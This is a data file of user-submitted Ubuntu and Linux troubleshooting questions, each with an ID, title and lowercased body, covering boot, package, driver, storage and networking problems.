303501	latex distribution problem pdftex.fmt	i just installed the texlive 2012 from the ubuntu repository . after installation , i try compiling and it gives the following error : unable to find pdftex.fmt . please let me know what is the problem ? now i uninstalled and purged the entire latex distro , and now it is leaving packages unconfigured . what would be the problem and what is the solution ?
303504	show keyboard indicator in ubuntu 13.04	i have been trying to show the keyboard indicator in ubuntu 13.04 . it is only available at the log in window at the right top of the panel , but ones getting in my account the menu strangely disappears .
303508	does ubuntu phone apis include qt mobility ?	i 'm currently developping an application for meego/harmattan . this app uses qt mobility api , and can easily be ported to sailfishos . i would like to know if this api is also supported in ubuntu phone ?
303510	xampp not running in limited user account	i have installed xampp in widows xp from admin account . it is running properly for the users who have administrator previlage , but it is not running in limited user account . kindly provide me a solution . iam using xampp 1.7.2 ( 32 bit )
303519	doing something if connected to particular ssid in ubuntu	i want to write a bash script that will put off dropbox automatic synchronization if i 'm connected to particular wifi ssid . how can i catch this event : for example i 'm working at home and sync is on , if i 'm at another place ( cafe , work , etc ) auto sync is off . also i want to do some other task depending on wifi ssid .
303526	how can i recover ubuntu 12.04 when grub ca n't find it ?	i upgraded to ubuntu 12.04 a couple of months ago , and have n't done anything special since . no dual boot installation or anything of the like , and i 'm running a 32 bit machine . this morning tracks started slipping in rhythmbox , and i realized that the sound of youtube videos was similarly slipping . i decided to reboot , but i was booted into ubuntu 11.10 which i ca n't log into at all as it just crashes immediately ( basically just freezes up ) . there is no ubuntu 12.04 ( linux kernel 3.02 ) option on my boot menu , i even tried to do a boot-repair which stated that everything ran successfully . it 's as if ubuntu 12.04 disappeared from my machine . is there any way to recover my 12.04 installation ? edit : $ sudo fdisk -l disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00050194 device boot start end blocks id system /dev/sda1 * 2048 952197119 476097536 83 linux /dev/sda2 952199166 976771071 12285953 5 extended /dev/sda5 952199168 976771071 12285952 82 linux swap / solaris edit2 : ok i tried to recover grub2 again , ubuntu 12.04 with linux kernel 3.2.0 is nowhere to be found in my newly created grub.cfg file . when i mount /dev/sda1 however i can see all my files . edit3 : when i boot using a live cd , and chroot , i get the following from the terminal : root @ ubuntu : / # cat /etc/lsb-release distrib_id=ubuntu distrib_release=11.10 distrib_codename=oneiric distrib_description= '' ubuntu 11.10 '' edit4 : ca n't seem to find the linux kernel version for ubuntu 12.04 either . root @ ubuntu : / # dpkg -l | grep `` linux\- [ a-z ] *\- '' ii linux-generic-pae 3.0.0.29.33 complete generic linux kernel ii linux-headers-3.0.0-29 3.0.0-29.46 header files related to linux kernel version 3.0.0 ii linux-headers-3.0.0-29-generic-pae 3.0.0-29.46 linux kernel headers for version 3.0.0 on x86 ii linux-headers-generic-pae 3.0.0.29.33 generic linux kernel headers ii linux-image-2.6.35-22-generic-pae 2.6.35-22.33 linux kernel image for version 2.6.35 on x86 rc linux-image-2.6.38-10-generic-pae 2.6.38-10.46 linux kernel image for version 2.6.38 on x86 rc linux-image-2.6.38-11-generic-pae 2.6.38-11.50 linux kernel image for version 2.6.38 on x86 rc linux-image-2.6.38-12-generic-pae 2.6.38-12.51 linux kernel image for version 2.6.38 on x86 rc linux-image-2.6.38-13-generic-pae 2.6.38-13.57 linux kernel image for version 2.6.38 on x86 rc linux-image-2.6.38-14-generic-pae 2.6.38-14.58 linux kernel image for version 2.6.38 on x86 rc linux-image-2.6.38-15-generic-pae 2.6.38-15.66 linux kernel image for version 2.6.38 on x86 ii linux-image-2.6.38-16-generic-pae 2.6.38-16.67 linux kernel image for version 2.6.38 on x86 rc linux-image-2.6.38-8-generic-pae 2.6.38-8.42 linux kernel image for version 2.6.38 on x86 ii linux-image-3.0.0-29-generic-pae 3.0.0-29.46 linux kernel image for version 3.0.0 on x86 ii linux-image-generic-pae 3.0.0.29.33 generic linux kernel image ii linux-libc-dev 3.0.0-29.46 linux kernel headers for development ii linux-sound-base 1.0.24+dfsg-0ubuntu2 base package for alsa and oss sound systems
303530	ubuntu will not update , i get an error	here is the error i get when trying to update ubuntu : could not initialize the package information an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : 'e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_precise_universe_binary-amd64_packages , e : the package lists or status file could not be parsed or opened . '
303538	can i dual boot ?	i have a small laptop currently running xp ( home/sp3 ) as my primary os and i wanted to try ibuntu , i downloaded and installed using the windows installer wubi.exe . it did the partiton for me and i just went along with a install guide and left the sizes and allocations as default . so now when i start my laptop i have the choice of os but ... .is there a way please to run both os 's side by side or have i gone about it wrong and should i have just downloaded an image file to use in a virtual machine ? many thanks in advance : )
303545	how to rebuild zfs pool with new disks of different sector sizes ?	i have ubuntu 12.04 with zfs installed . there are two pools : rpool ( the root filesystem ) and rdata ( all the data ) . rdata was built with 2 x 1tb wd eads drives ( with 512 byte physical sectors ) in a zfs mirror . rdata has many datasets on it in a hierarchy . rdata is running out of space so i have purchased 2 x seagate 3tb drives . unfortunately , when i tried to add one the the new drives to the mirror , so that it would resilver , zpool attach failed saying can not attach /dev/disk/by-id/scsi-sata_st3000dm001-1ch_w1f1ee1g-part1 to /dev/disk/by-id/scsi-sata_wdc_wd10eads-00_wd-wcau47275172-part1 : devices have different sector alignment i now know this is because the new drives ave 4k physical sectors and the only recovery path is to rebuild the pool . i am proposing to do the following : ensure there is a snapshot of all datasets on rdata . remove 1 element of the rdata mirror ( so i have a known good backup and to free up a sata port ) connect one of the new drives to the machine create a new pool called rdata1 with 4k sectors and a single physical device use zpool recv to restore the snapshots of rdata 's datasets to rdata1 at this point , rdata1 should be identical to rdata export the device on which rdata1 is located destroy rdata import the device that contained rdata1 as rdata remove the old physical disk and replace it with the other new disk attach the other new disk to the newly created rdata to re-create the mirror does this sound reasonable ? i 'll still have the second old disk if it goes wrong and as a final resort , i have another freenas server that has a full backup of all the snapshots ; just in case . gareth
303546	how to install the latest version of a package with apt-get ?	it 's easy to install a specific version of a package with apt-get : apt-get install < package name > = < version > for example : apt-get install jenkins=1.517 but is there a shortcut for installing the latest version ? for example , say writing a script to automate jenkins installation . after adding http : /q/pkg.jenkins-ci.org/debian to /etc/apt/sources.list , jenkins is available from two sources . now , i 'd like to tell apt-get to install the latest version without knowing exactly what the latest version is at the time the script is executed . is this possible in any simple way ?
303551	installing rails on ubuntu 13.04	i tried installing rails according to this guide , and when i do , i get this error : $ sudo gem install rails warning : error fetching data : errno : :enoent : no such file or directory - getaddrinfo ( http : //rubygems.org/specs.4.8.gz ) warning : error fetching data : errno : :enoent : no such file or directory - getaddrinfo ( http : //rubygems.org/latest_specs.4.8.gz ) building native extensions . this could take a while ... error : error installing rails : error : failed to build gem native extension . /usr/bin/ruby1.9.1 extconf.rb /usr/lib/ruby/1.9.1/rubygems/custom_require.rb:36 : in `require ' : can not load such file -- mkmf ( loaderror ) from /usr/lib/ruby/1.9.1/rubygems/custom_require.rb:36 : in `require' from extconf.rb:1 : in ` < main > ' gem files will remain installed in /var/lib/gems/1.9.1/gems/json-1.8.0 for inspection . results logged to /var/lib/gems/1.9.1/gems/json- 1.8.0/ext/json/ext/generator/gem_make.out i 've never seen anything like this before , so any feedback would be greatly appreciated .
303555	creating a static route and a default gateway	im having troubles with my routing table , im getting rtnetlink answers : file exist how do i set my default gateway ( internet ) to 192.168.100.1 ? and a static route going to 10.169.5.0 /26 ? i have 2 gw as shown in flags , how do i remove the g on my route line # 2 ? destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.100.1 0.0.0.0 ug 100 0 0 eth0 10.169.5.0 10.169.5.1 255.255.255.192 ug 0 0 0 eth1 192.168.5.0 0.0.0.0 255.255.255.0 u 0 0 0 eth2
303556	how do i recover the gnome classic default panel ?	i have accidentally deleted the gnome classic default panel . i am not able to recover the same . i have tried uninstalling and then installing the gnome shell -- but no help . i had run the following commands : dconf reset -f /org/gnome/gnome-panel/ killall gnome-panel then ran the following command : sudo apt-get install gnome-session-fallback deleted the ~/.gnome folder . but still not able to recover it . how do i recover the gnome classic default panel ?
303558	why am i not able to access the hard disk partitions ?	i ca n't access my hard disk partitions on ubuntu . it shows the following error message : unable to access error mounting /dev/sda5 at /media/zerox/zerox : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda5 '' `` /media/zerox/zerox '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda5 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . what do i do to access the partitions ?
303564	ubuntu wubi booting problems	i 've previously installed windows 7 and windows 8 and both of them in dual boot with windows 8 bootloader . then , i installed ubuntu 13.04 by using wubi in windows 8 in a separate partition ( e ) . so , the windows 8 bootloader have ubuntu listed automatically . everything worked fine . i 've deleted windows 8 installation and switched my bootloader to windows 7 bootmanager . but , i ca n't get ubuntu 13.04 to boot . now , it is installed in drive e and i can not able to boot it . i 've used easybcd and also command prompt commands to change the drive letters and paths . but , after doing this error is showing up as : grldr is missing . press ctrl + alt + delete to restart any ideas ? how can i install wubi bootloader ?
303565	backup the server	i am using ubuntu as a server with windows xp clients . there are many files shared via samba . i need to schedule automatic backup of the files which is shared via samba ( that is i need to backup the samba share completely ) and the files in apache svn which in my ubuntu server to another computer . which one is better to store backups , a ubuntu pc or windows pc ? also , what are the procedures in setting up automatic backup ?
303567	getting imac mid 2011 to dual-boot ubuntu from usb drive	i have been trying to get my imac mid 2011 to dual boot ubuntu with lion or mountain lion . first i tried with an ubuntu dvd with no success then a formatted usb drive using the instructions here : using the usb and these instructions have worked a treat for me on both a macbook pro 2012 and a mac mini mid 2011 and i have dual boot working great on both . all i need to do is press alt on startup to choose what os to boot . i did not need to use refit or refind ( as they did not work for me ) . http : //askubuntu.com/questions/219886/impossible-to-boot-ubuntu-on-a-usb-stick-os-x-montain-lion on the imac i have tried in turn a ) refind , b ) pressing alt on boot , c ) press c on boot up and none has been able to identify the usb ( or cd ) boot disk to boot from it . has anyone tried this on an imac and can they help me out . many thanks in advance
303570	restricting usb usage	i 'm using ubuntu as a server with windows xp clients . i need to block usb ports for clients ( xp ) through ubuntu from accessing storage media without affecting the usb i/o devices . is there any centralized way to control usb access on xp clients from ubuntu ? . is it possible to do this with any third party apps ?
303571	restricting usb access	i 'm using ubuntu as a server with windows xp clients . i need to block usb ports for clients ( xp ) through ubuntu from accessing storage media without affecting the usb i/o devices . is there any centralized way to control usb access on xp clients from ubuntu ? . is it possible to do this with any third party apps ?
303578	how do i remove infected files in a ubuntu server samba share ?	i am running a ubuntu server with windows xp clients . i have shared files with xp clients via samba share . the problem is there is a huge number of viruses in the share . is there any way to remove those virus from ubuntu itself ? windows clients only have read permission .
303579	painlessly updating from ubuntu 10.04 to 11.04 or 11.x	is there a way to update from 10.04 to 11.04 ? i see an option to update to 12.04 lts but i would rather keep it 11.04 because the new ui is terrible : ) it 's because of nvidia drivers and failing to set them up on a 2.6.32-lts when the drivers need 2.6.34-arch or something such ... . if there is no way to update to 11.04 , is there a way to use 12.04 so that it looks like the good ol ' 11.04 ? : )
303582	resize partitions	i have a pc with ubuntu 12.04 and windows 7 in dual boot . the ubuntu partition has 25gb of disk space and i 'm running out of space so i want to make this partition bigger . the situation is the following : dispositivo boot start end blocks id system /dev/sda1 2048 3071999 1534976 82 linux swap / solaris /dev/sda2 * 3072000 254730239 125829120 7 hpfs/ntfs/exfat /dev/sda3 254730240 438394879 91832320 7 hpfs/ntfs/exfat /dev/sda4 438396926 488396799 24999937 5 esteso /dev/sda5 438396928 488396799 24999936 83 linux gparted screenshot the sda2 partition is the windows 7 one , in sda3 i have only some data ( this is the partition that i want to resize to gain space for the ubuntu one ) and then in sda4-5 there is ubuntu . my questions are : i do n't understand what is the sda4 partition that seems to contain the ubuntu one ( sda5 ) is safe to resize partitions sda3 and sda5 using gparted from a livecd ? i mean safe both for windows ( data in sda3 and system in sda2 ) and for ubuntu ( sda5 ) . it is better if i move my data from partition sda3 to an external memory before doing the resize ?
303583	changing hostname causes unity to does n't startup	i changed my hostname from jv01-carlos.becker to jv01-carlosbecker in /etc/hostname and /etc/hosts . after that , unity just never loads . i could open a browser and everything creating a folder in desktop and opening it , then poiting to /usr/share/applications . how can i fix that ? i could n't find any relevant logs in /var/log/syslog . thanks in advance btw : i switched back to my old hostname , and the issue persisted . edit : ~/.xsession-errors edit2 : just remembered that i also upgrade the kernel to 3.8.0-23
303593	how to make chmod 777 all /var/www subfolders	im running webserver and ftp server , where my /var/www is binded on my /home/user/www i made both directory at chmod 777 ( which is fine since its for testing only ) i can upload files inside /home/user/www but whenever i create new directory , i always have to chmod 777 that folder so i could just browse it . else , i get this you do n't have permission to access /test/ on this server . is there a way i could make all sub-folders inside /var/www to be accessible by anyone ? or simply say just make it automatically to be chmod 777 ? its kinda annoying to go inside that folder and type chmod 777 everytime .
303596	vmware wo n't start any vm 's	i recently took the step , formatting my main drive and installing ubuntu 12.04 lts in place of windows 7 . i 'm not too much of a stranger to linux i use it frequently in work , but this one has me stumped . in the course of setting everything up , i installed vmware workstation 9 . however , when i tried to turn on my first imported vm , it gave an error : unable to change virtual machine power state : can not find a valid peer process to connect to i wanted to eliminate the possibility of an incompatibility , so i set up a brand new vm with a different os but got the same error . playing around with the settings yielded a different error : unable to change virtual machine power state : failed to power on ' ( vm name ) ' . transport ( vmdb ) error -14 : pipe connection has been broken . i have played around with the vmx file and googled extensively , also tried removing all the virtual hardware i could without any luck , i am simply unable to power on any vm 's . i looked through the questions and answers relating to this problem on this site and tried the suggestions , most of them did not apply , and none of them described accurately the problem i am experiencing . any idea what could be causing this ?
303600	i get the red circle with the white line	this is what it says : an ocurred , please run package manager from right-click menu or apt-get in a terminal to see what is wrong . the error message was : error : opening the cache ( e : encountered a section with no package : header , e : problem with mergelist/var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_raring_security_multiverse_i18n_translation-en e : the package lists or status file could not be parsed or opened. ) ' . this usually means that your installed packages have unmet dependencies i tried the following : sudo rm /var/lib/apt/lists/* -vf sudo apt-get update but still i have not fixed it . any idea how to fix it ?
303603	why wo n't fancontrol start on boot , but will start with sudo ?	i 've configured /etc/fancontrol to my liking # configuration file generated by pwmconfig , changes will be lost interval=10 devpath=hwmon0=devices/platform/it87.552 devname=hwmon0=it8718 fctemps=hwmon0/device/pwm2=hwmon0/device/temp2_input hwmon0/device/pwm1=hwmon0/device/temp1_input fcfans=hwmon0/device/pwm2=hwmon0/device/fan2_input hwmon0/device/pwm1=hwmon0/device/fan1_input mintemp=hwmon0/device/pwm2=20 hwmon0/device/pwm1=20 maxtemp=hwmon0/device/pwm2=60 hwmon0/device/pwm1=60 minstart=hwmon0/device/pwm2=150 hwmon0/device/pwm1=150 minstop=hwmon0/device/pwm2=100 hwmon0/device/pwm1=100 maxpwm=hwmon0/device/pwm2=225 hwmon0/device/pwm1=225 sudo fancontrol works perfectly . but it wo n't start on boot . update ok , i think i 've found the problem . in /etc/init.d there is a file called : james @ middlepc : /etc/init.d $ ls fan* fancontrol.dpkg-bak if i run sudo /etc/init.d/fancontrol.dpkg-bak start the fan controller starts . should this be fancontrol ? is this evidence of a corrupted installation ? update 2 i 've tried renaming fancontrol.dpkg-bak to fancontrol . it still does n't start on boot rest of original post if i run fancontrol without sudo i get the following output : loading configuration from /etc/fancontrol ... common settings : interval=10 settings for hwmon0/device/pwm2 : depends on hwmon0/device/temp2_input controls hwmon0/device/fan2_input mintemp=20 maxtemp=60 minstart=150 minstop=100 minpwm=0 maxpwm=225 settings for hwmon0/device/pwm1 : depends on hwmon0/device/temp1_input controls hwmon0/device/fan1_input mintemp=20 maxtemp=60 minstart=150 minstop=100 minpwm=0 maxpwm=225 error : file hwmon0/device/pwm2 does n't exist error : file hwmon0/device/pwm1 does n't exist at least one referenced file is missing . either some required kernel modules have n't been loaded , or your configuration file is outdated . in the latter case , you should run pwmconfig again . i tried changing devpath=hwmon0=devices/platform/it87.552 to devpath=hwmon0=/sys/devices/platform/it87.552 but that just produces : loading configuration from /etc/fancontrol ... common settings : interval=10 settings for hwmon0/device/pwm2 : depends on hwmon0/device/temp2_input controls hwmon0/device/fan2_input : mintemp=20 maxtemp=60 minstart=150 minstop=100 minpwm=0 maxpwm=225 settings for hwmon0/device/pwm1 : depends on hwmon0/device/temp1_input controls hwmon0/device/fan1_input mintemp=20 maxtemp=60 minstart=150 minstop=100 minpwm=0 maxpwm=225 device path of hwmon0 has changed configuration appears to be outdated , please run pwmconfig again if i run sudo find / | grep it87.552 i get : /sys/devices/platform/it87.552 /sys/devices/platform/it87.552/uevent /sys/devices/platform/it87.552/modalias /sys/devices/platform/it87.552/subsystem /sys/devices/platform/it87.552/power /sys/devices/platform/it87.552/power/async /sys/devices/platform/it87.552/power/runtime_status /sys/devices/platform/it87.552/power/runtime_usage /sys/devices/platform/it87.552/power/runtime_active_kids /sys/devices/platform/it87.552/power/runtime_enabled /sys/devices/platform/it87.552/power/control /sys/devices/platform/it87.552/power/runtime_suspended_time /sys/devices/platform/it87.552/power/runtime_active_time /sys/devices/platform/it87.552/power/autosuspend_delay_ms /sys/devices/platform/it87.552/driver /sys/devices/platform/it87.552/in0_input /sys/devices/platform/it87.552/in1_input /sys/devices/platform/it87.552/in2_input /sys/devices/platform/it87.552/in3_input /sys/devices/platform/it87.552/in4_input /sys/devices/platform/it87.552/in5_input /sys/devices/platform/it87.552/in6_input /sys/devices/platform/it87.552/in7_input /sys/devices/platform/it87.552/in8_input /sys/devices/platform/it87.552/in0_min /sys/devices/platform/it87.552/in1_min /sys/devices/platform/it87.552/in2_min /sys/devices/platform/it87.552/in3_min /sys/devices/platform/it87.552/in4_min /sys/devices/platform/it87.552/in5_min /sys/devices/platform/it87.552/in6_min /sys/devices/platform/it87.552/in7_min /sys/devices/platform/it87.552/in0_max /sys/devices/platform/it87.552/in1_max /sys/devices/platform/it87.552/in2_max /sys/devices/platform/it87.552/in3_max /sys/devices/platform/it87.552/in4_max /sys/devices/platform/it87.552/in5_max /sys/devices/platform/it87.552/in6_max /sys/devices/platform/it87.552/in7_max /sys/devices/platform/it87.552/in0_alarm /sys/devices/platform/it87.552/in1_alarm /sys/devices/platform/it87.552/in2_alarm /sys/devices/platform/it87.552/in3_alarm /sys/devices/platform/it87.552/in4_alarm /sys/devices/platform/it87.552/in5_alarm /sys/devices/platform/it87.552/in6_alarm /sys/devices/platform/it87.552/in7_alarm /sys/devices/platform/it87.552/temp1_input /sys/devices/platform/it87.552/temp2_input /sys/devices/platform/it87.552/temp3_input /sys/devices/platform/it87.552/temp1_max /sys/devices/platform/it87.552/temp2_max /sys/devices/platform/it87.552/temp3_max /sys/devices/platform/it87.552/temp1_min /sys/devices/platform/it87.552/temp2_min /sys/devices/platform/it87.552/temp3_min /sys/devices/platform/it87.552/temp1_type /sys/devices/platform/it87.552/temp2_type /sys/devices/platform/it87.552/temp3_type /sys/devices/platform/it87.552/temp1_alarm /sys/devices/platform/it87.552/temp2_alarm /sys/devices/platform/it87.552/temp3_alarm /sys/devices/platform/it87.552/alarms /sys/devices/platform/it87.552/intrusion0_alarm /sys/devices/platform/it87.552/name /sys/devices/platform/it87.552/in0_beep /sys/devices/platform/it87.552/in1_beep /sys/devices/platform/it87.552/in2_beep /sys/devices/platform/it87.552/in3_beep /sys/devices/platform/it87.552/in4_beep /sys/devices/platform/it87.552/in5_beep /sys/devices/platform/it87.552/in6_beep /sys/devices/platform/it87.552/in7_beep /sys/devices/platform/it87.552/temp1_beep /sys/devices/platform/it87.552/temp2_beep /sys/devices/platform/it87.552/temp3_beep /sys/devices/platform/it87.552/fan1_input /sys/devices/platform/it87.552/fan1_min /sys/devices/platform/it87.552/fan1_alarm /sys/devices/platform/it87.552/fan1_beep /sys/devices/platform/it87.552/fan2_input /sys/devices/platform/it87.552/fan2_min /sys/devices/platform/it87.552/fan2_alarm /sys/devices/platform/it87.552/fan2_beep /sys/devices/platform/it87.552/fan3_input /sys/devices/platform/it87.552/fan3_min /sys/devices/platform/it87.552/fan3_alarm /sys/devices/platform/it87.552/fan3_beep /sys/devices/platform/it87.552/fan4_input /sys/devices/platform/it87.552/fan4_min /sys/devices/platform/it87.552/fan4_alarm /sys/devices/platform/it87.552/fan4_beep /sys/devices/platform/it87.552/pwm1_enable /sys/devices/platform/it87.552/pwm1 /sys/devices/platform/it87.552/pwm1_freq /sys/devices/platform/it87.552/pwm1_auto_channels_temp /sys/devices/platform/it87.552/pwm2_enable /sys/devices/platform/it87.552/pwm2 /sys/devices/platform/it87.552/pwm2_freq /sys/devices/platform/it87.552/pwm2_auto_channels_temp /sys/devices/platform/it87.552/pwm3_enable /sys/devices/platform/it87.552/pwm3 /sys/devices/platform/it87.552/pwm3_freq /sys/devices/platform/it87.552/pwm3_auto_channels_temp /sys/devices/platform/it87.552/vrm /sys/devices/platform/it87.552/cpu0_vid /sys/devices/platform/it87.552/in3_label /sys/devices/platform/it87.552/in8_label /sys/devices/platform/it87.552/hwmon /sys/devices/platform/it87.552/hwmon/hwmon0 /sys/devices/platform/it87.552/hwmon/hwmon0/uevent /sys/devices/platform/it87.552/hwmon/hwmon0/subsystem /sys/devices/platform/it87.552/hwmon/hwmon0/device /sys/devices/platform/it87.552/hwmon/hwmon0/power /sys/devices/platform/it87.552/hwmon/hwmon0/power/async /sys/devices/platform/it87.552/hwmon/hwmon0/power/runtime_status /sys/devices/platform/it87.552/hwmon/hwmon0/power/runtime_usage /sys/devices/platform/it87.552/hwmon/hwmon0/power/runtime_active_kids /sys/devices/platform/it87.552/hwmon/hwmon0/power/runtime_enabled /sys/devices/platform/it87.552/hwmon/hwmon0/power/control /sys/devices/platform/it87.552/hwmon/hwmon0/power/runtime_suspended_time /sys/devices/platform/it87.552/hwmon/hwmon0/power/runtime_active_time /sys/devices/platform/it87.552/hwmon/hwmon0/power/autosuspend_delay_ms /sys/bus/platform/devices/it87.552 /sys/bus/platform/drivers/it87/it87.552
303605	get the first blocks of a torrent in priority	i 'd like to be able to begin to watch a video as soon as i start a torrent to download . is there an option in transmission for enabling this functionality as in âľtorrent .
303607	bluetooth firmware problem in ubuntu 13.04	i have a [ dell inspiron ] [ 1 ] 15r 5520 laptop . bluetooth is not working at all . rfkill list all gives 0 : hci0 : bluetooth soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no 2 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no dmesg|grep -i bluetooth gives [ 13.644428 ] bluetooth : core ver 2.16 [ 13.644445 ] bluetooth : hci device and connection manager initialized [ 13.644453 ] bluetooth : hci socket layer initialized [ 13.644455 ] bluetooth : l2cap socket layer initialized [ 13.644461 ] bluetooth : sco socket layer initialized [ 15.861363 ] bluetooth : hci0 command 0x1003 tx timeout [ 15.903443 ] bluetooth : ca n't load firmware , may not work correctly [ 17.332535 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 17.332538 ] bluetooth : bnep filters : protocol multicast [ 17.332544 ] bluetooth : bnep socket layer initialized [ 17.393768 ] bluetooth : rfcomm tty layer initialized [ 17.393781 ] bluetooth : rfcomm socket layer initialized [ 17.393783 ] bluetooth : rfcomm ver 1.11 hciconfig gives hci0 : type : br/edr bus : usb bd address : e0:06 : e6 : d5 : db:46 acl mtu : 1021:8 sco mtu : 64:1 up running pscan iscan rx bytes:687 acl:0 sco:0 events:56 errors:0 tx bytes:2024 acl:0 sco:0 commands:52 errors:0 i have visited the site http : //wireless.kernel.org/en/users/drivers/b43 and according to it lspci -vnn -d 14e4 : gives 08:00.0 network controller [ 0280 ] : broadcom corporation bcm43142 802.11b/g/n [ 14e4:4365 ] ( rev 01 ) subsystem : dell wireless 1704 802.11n + bt 4.0 [ 1028:0016 ] flags : bus master , fast devsel , latency 0 , irq 17 memory at c1500000 ( 64-bit , non-prefetchable ) [ size=32k ] capabilities : < access denied > kernel driver in use : wl so i got my pci-id as 14e4:4365 which it says is not supported . the alternative is wl . what should i do ? my wi-fi is working normally without any problems , but bluetooth is not working . sudo dpkg -i wireless-bcm43142-dkms_6.20.55.19-1_amd64.deb gives following error ( reading database ... 208543 files and directories currently installed . ) unpacking wireless-bcm43142-dkms ( from wireless-bcm43142-dkms_6.20.55.19-1_amd64.deb ) ... setting up wireless-bcm43142-dkms ( 6.20.55.19-1 ) ... loading new wireless-bcm43142-6.20.55.19 dkms files ... building only for 3.8.0-23-generic building initial module for 3.8.0-23-generic traceback ( most recent call last ) : file `` /usr/share/apport/package-hooks/dkms_packages.py '' , line 22 , in < module > import apport importerror : no module named apport error ! bad return status for module build on kernel : 3.8.0-23-generic ( x86_64 ) consult /var/lib/dkms/wireless-bcm43142/6.20.55.19/build/make.log for more information .
303614	viewing page tables in filesystem	i know that the page table is managed by the linux kernel , though i am not sure if it is available on the filesystem . i 'd like to view information about page tables from the command line . as background , i 've been learning about page tables and how they are critical to managing processes , where each process is assigned its own address space so that process a can not write to process b 's memory space . essentially , the page table maps between virtual addresses and physical addresses . i would like to actually view from the command line this mapping to see how it works . any pointers in the right direction are appreciated .
303621	how to play videos ( with sound ) on another x session ?	i normally use tty7 ( the default x session ) for playing games by running them directly from lightdm , thus not loading unity to save resources . i sometimes need to use a web browser while i 'm playing , so i 'll use xinit -- :1 and then run the browser on that display . at first , i could n't get sound on tty8 ( display :1 ) , but following the instructions on this page i was able to get sound . however , the problem is that the sound is shared over all tty 's logged in as my username . this gets annoying when the video game has music playing and i 'm trying to watch a video on another tty/display . of course , i can mute the game , but this gets repetitive after a while . ideally , each x-session would have its own sound , completely separate from the other x-sessions . i realize that i could log-in as a different user to separate the sound , but this seems like a horribly inelegant solution , especially since i 'm the only one who uses this computer . so , is there any way to separate the sounds of each tty/x-session , and not have them overlap ?
303622	storing data on the harddrive or other flash drives from a bootable usb stick	we are looking at options for deploying some simple software to hundreds of enrollment centres . we are thinking of using bootable usb sticks . however , we would need to take backups . so the question is , is it possible to save to other drives from ubuntu bootable usb sticks ? best , ajay
303624	python 's ide eric fails to start in ubuntu 13.04	i was using eric with ubuntu 12.xx but with 13.04 i get a system error . i do not know how it sound exactly in english but it must be something close to `` segment violation ( kernel image dump ) '' ( i have got ubuntu in catalan ) . could you please help me with this ? thank you and best regards ,
303627	make an accesible python server	i 'm using the python library socket to create a program , and i want to be able to allow my friends to connect from their homes . i have the rest of the program running and it works great on the localhost and on a local network , but i want to be able to , like i said , let my friends connect . my guess is that i would have to use my global ip address , and i can get that via pystun , but whenever i try to bind the socket/server thing to my global ip address it barfs back this error : socket.error : [ errno 99 ] can not assign requested address` how can i fix this problem ?
303631	can i install a new version of ubuntu over old ubuntu that i forgot the password to	i have forgotten my password for an older version of ubuntu and do n't have anything important on it and just want to install the new version , do i need to know the password in order to do this ?
303634	how to make ltsp log into the windows 7 vm	i have managed to install ubuntu server and mythbuntu and a remote front-end . now i think it could be nice to integrate my windows machine with the server and use linux terminal server project ( ltsp ) to log directly into the windows 7 desktop . can it be done and if yes how do i do it ? i have the windows license and will be the only user . to be more precise : i would like to be able to set up a ltsp client from where i can log into a windows 7 session running in kvm or similar . i have not made the windows vm yet , but i am trying to figure out how to log into it automatically via ltsp . the ubuntu server is up and running and i have made normal ubuntu vms using kvm . i just did n't want to move the existing windows license before i had some ok odds for it to work .
303642	installing epson printer/ scanner	how can i install my epson me office 535 all-in-one printer/scanner in ubuntu 13.04 ? .
303648	how do i install divergence iv - `` a new hope '' ?	i found that ubuntu is quite tacky so i found divergence iv - `` a new hope '' . i tried but can not install it . how do i install it , please give clear simple steps as i am just a basic user .
303654	is there a way that i can disable change password	i have 20 computers in a high school lab and i want to set up a standard student log in . this is done , the problem is that students can change the password to anything , is there a way to block this ? thanks .
303655	is there a way to show the plugged in removable drives on the { unity } desktop ?	is there a way to display drive icons , like in gnome 2.x and cinnamon on the unity desktop ?
303662	how to check crc of a file ?	i was looking this question and appears everything but crc . is there a good ubuntu way around there to do this ?
303665	notifyosd history	does notifyosd keeps a history of its messages ? if so how can i access it ? because sometimes it would be very useful to me being able keep record of the notifications in order to report some bugs and other related stuff .
303669	what 's the difference between 12.04.1 lts and 12.04.2 lts ?	just what the title is . i 'm wondering what the difference is .
303672	jres from different vendors on the same system	in various tutorials , it is said , that you should remove existing jre/jdk before installing new one ( e.g . remove openjdk before installing the one from oracle ) . is it really necessary ? i remember having 2 jres at one point , being able to choose in my ide which to run program on . do n't remember to have any conflicts , what 's the chance of having any ?
303675	installed a nvidia driver and broke ubuntu , how would i fix this ?	right this is pretty much my own fault , i was trying to get steam to work and i had already tried all the experimental drivers so i decided to start from the beginning ; i installed the first nvidia driver from the additional drivers menu . ubuntu does not load . if i launch from recovery mode the computer tells me that the drivers will not load until i reboot , and i get to log in through what appears to be a full screen terminal . i can ctrl-alt-f1 and ctrl-alt-f2 through and create different log ins . i was wondering if someone could guide me through the process of uninstalling and installing a working driver from here , that is only if that is the problem and i missed something completely . i am running 12.04 on a acer aspire 6935 laptop , if more information is needed please ask away . thank you !
303686	no sound after startup , have to alsa force-reload`	everytime my pc is booted , ubuntu ( 13.04 ) is muted in the sense that it does not play any sound . i found out that i have to type sudo alsa force-reload in order to get the sound working again . how can i fix this issue so that ubuntu plays sound after a startup ?
